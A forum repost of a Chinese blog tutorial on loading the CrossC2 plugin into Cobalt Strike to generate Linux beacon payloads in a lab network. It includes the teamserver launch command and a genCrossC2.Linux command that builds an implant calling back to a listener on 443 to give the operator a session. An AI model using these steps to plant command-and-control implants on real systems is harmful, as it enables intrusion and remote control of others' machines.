Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

Recommended Posts

在前面的几期文章中,我们讲到了CobaltStrike的安装汉化极其使用。但是没有一个工具是十全十美的,CS也是如此。在使用过程中我们发现,cs在生成shell时只能生成windows平台下的.exe而对于mac和Linux主机则无法生成相应的shell。这严重的阻碍了我们学习的动力,那么我们该怎样解决呢?

这时,我们就需要用到第三方插件CrossC2

实验环境

  • kali2022
  • CS4.5
  • Centos7(如果没有可用kali代替)
  • 同一局域网(外网需映射)

下载和配置CrossC2

我们到CrossC2的项目地址:https://github.com/gloxec/CrossC2/releases下载这两个文件。
CrossC2-GithubBot-2022-06-07.cna genCrossC2.Linux 前者时cs的插件文件。
2855281907.png
下载完成后,我们复制到kali中的cs目录下。
3460355606.png

启动cobaltstrike

#启动服务端
./teamserver 192.168.50.123 123
#启动cs
./cobaltstrike

4139230034.png
将插件CrossC2安装到cs中
依次点击cobaltstrike-脚本管理器
选择我们的插件后载入
4083831593.png
这时候,我们的菜单栏会有CrossC2的选项。

配置https监听

Linux的shell目前只支持https,我们在cs中配置https监听。
4025864885.png

生成Linux终端下的shell

生成的方法有两种,首先来看第一种。
我们在cs目录下运行下面命令

./genCrossC2.Linux 192.168.50.123 443 .cobaltstrike.beacon_keys null Linux x64 /tmp/test

参数说明:
/genCrossC2.Linux:就是我们在github下载的文件
.cobaltstrike.beacon_keys :是cs的证书文件,默认在cs目录下,注意是隐藏文件用ls -a命令可查看。
192.168.50.123 443:分别为kali的IP地址和端口。
528185717.png
这样便在kali的tmp目录下生成了一个test文件,执行命令./test便可以得到会话。
第二种方法就是用CrossC2直接生成。
1470901825.png
但是由于版本的多样性,这种方法并不一定会成功。建议采用第一步!

效果

3460714021.png

欢迎关注微信公众号 kali黑客笔记


版权属于:逍遥子大表哥

本文链接:https://blog.bbskali.cn/3576.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...